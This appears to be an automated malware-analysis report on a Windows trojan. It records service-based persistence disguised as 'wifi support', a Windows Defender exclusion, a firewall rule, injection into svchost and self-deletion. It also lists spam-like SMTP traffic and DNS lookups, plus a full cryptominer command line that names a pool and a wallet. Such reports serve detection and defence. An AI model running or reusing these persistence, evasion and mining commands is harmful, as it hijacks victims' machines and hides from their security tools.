Technical Information
To ensure autorun and distribution
Sets the following service settings
- [<HKLM>\System\CurrentControlSet\Services\aiuhfkgp] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\aiuhfkgp] 'ImagePath' = '%WINDIR%\SysWOW64\aiuhfkgp\pnxvvluk.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\aiuhfkgp] 'ImagePath' = '%WINDIR%\SysWOW64\aiuhfkgp\pnxvvluk.exe'
Creates the following services
- 'aiuhfkgp' %WINDIR%\SysWOW64\aiuhfkgp\pnxvvluk.exe /d"<Full path to file>"
- 'aiuhfkgp' %WINDIR%\SysWOW64\aiuhfkgp\pnxvvluk.exe
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\aiuhfkgp' = '00000000'
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- %WINDIR%\syswow64\svchost.exe
Modifies file system
Creates the following files
- %TEMP%\pnxvvluk.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Moves the following files
- from %TEMP%\pnxvvluk.exe to %WINDIR%\syswow64\aiuhfkgp\pnxvvluk.exe
Deletes itself.
Network activity
Connects to
- 'mi##########m.mail.protection.outlook.com':25
- 'ip.####y.hacklix.com':443
- 'mx#.#omcast.net':25
- 'mx.#len.pl':25
- 'fa###ool.xyz':10060
- 'mx##.mail.com':25
- 'fi######.antispamcloud.com':25
- 'in###gram.com':443
- 'google.com':443
- 'google.com':80
- 'mx##.os-ms.eu':25
- '5.##.37.41':418
- '21#.#27.140.23':418
- '95.##6.195.92':418
- 'ma##.#ariomedia.de':25
- '19#.#6.146.41':418
- '19#.#6.146.42':418
- 'ma####2.g-fit.de':25
- 'mx##.###ure-mailgate.com':25
- 'es##.##rz.uni-bonn.de':25
- 'mx##.#spgateway.de':25
- 'se#####00.t-systems.com':25
- 'mx##.ionos.de':25
- 'mx##.##ndenserver.de':25
- 'localhost':25
- 'mx##.schlund.de':25
- 'ma##.emailn.de':25
- 'de###twax.ru':482
- 'de###twax.ru':443
- '19#.#6.146.43':418
- 'ma##.aprixon.de':25
TCP
HTTP GET requests
- http://www.google.com/
Other
- 'de###twax.ru':443
- 'ip.####y.hacklix.com':443
- 'fa###ool.xyz':10060
- 'fi######.antispamcloud.com':25
- 'mx##.os-ms.eu':25
- 'in###gram.com':443
- 'google.com':443
- '95.##6.195.92':418
- '19#.#6.146.42':418
- '19#.#6.146.43':418
- '5.##.37.41':418
- '19#.#6.146.41':418
- '21#.#27.140.23':418
- 'ma####2.g-fit.de':25
- 'mx##.###ure-mailgate.com':25
- 'es##.##rz.uni-bonn.de':25
- 'ma##.emailn.de':25
- 'de###twax.ru':482
- 'ma##.#ariomedia.de':25
- 'ma##.aprixon.de':25
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK in####-mission.de
- DNS ASK mx##.os-ms.eu
- DNS ASK google.com
- DNS ASK in###gram.com
- DNS ASK wr####ing-fusion.de
- DNS ASK wi#####mmunication.de
- DNS ASK fi######.antispamcloud.com
- DNS ASK ni######ll-federation.de
- DNS ASK ki###ation.de
- DNS ASK ma##.#idstation.de
- DNS ASK pe####station.de
- DNS ASK de####-action.de
- DNS ASK he###vision.de
- DNS ASK ma####2.g-fit.de
- DNS ASK te##on.de
- DNS ASK ka##on.de
- DNS ASK ma##.com
- DNS ASK mx##.mail.com
- DNS ASK fa###ool.xyz
- DNS ASK tl#n.pl
- DNS ASK mx.#len.pl
- DNS ASK co##ast.net
- DNS ASK mx#.#omcast.net
- DNS ASK ip.####y.hacklix.com
- DNS ASK hu##nson.de
- DNS ASK ni###auson.de
- DNS ASK ma##.#ariomedia.de
- DNS ASK sk##elon.de
- DNS ASK pr##ron.de
- DNS ASK mx##.###ure-mailgate.com
- DNS ASK ha###ashion.de
- DNS ASK tw##n.de
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK em##ln.de
- DNS ASK ma##.emailn.de
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK ju###ohann.de
- DNS ASK mx##.schlund.de
- DNS ASK ma#####brueggemann.de
- DNS ASK mb###mann.de
- DNS ASK mx##.##ndenserver.de
- DNS ASK de###twax.ru
- DNS ASK bi###lmann.de
- DNS ASK mx##.ionos.de
- DNS ASK u-###lmann.de
- DNS ASK ka##ann.de
- DNS ASK se#####00.t-systems.com
- DNS ASK mi##mann.de
- DNS ASK we####chstmann.de
- DNS ASK ag##mann.de
- DNS ASK vo###reymann.de
- DNS ASK ba###ainn.de
- DNS ASK mn#.de
- DNS ASK mx##.#spgateway.de
- DNS ASK gi##.#ni-bonn.de
- DNS ASK es##.##rz.uni-bonn.de
- DNS ASK he###elmann.de
- DNS ASK ap##xon.de
- DNS ASK ma##.aprixon.de
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\aiuhfkgp\pnxvvluk.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\aiuhfkgp\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\pnxvvluk.exe" %WINDIR%\SysWOW64\aiuhfkgp\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create aiuhfkgp binPath= "%WINDIR%\SysWOW64\aiuhfkgp\pnxvvluk.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description aiuhfkgp "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start aiuhfkgp' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\aiuhfkgp\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\pnxvvluk.exe" %WINDIR%\SysWOW64\aiuhfkgp\
- '%WINDIR%\syswow64\sc.exe' create aiuhfkgp binPath= "%WINDIR%\SysWOW64\aiuhfkgp\pnxvvluk.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description aiuhfkgp "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start aiuhfkgp
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
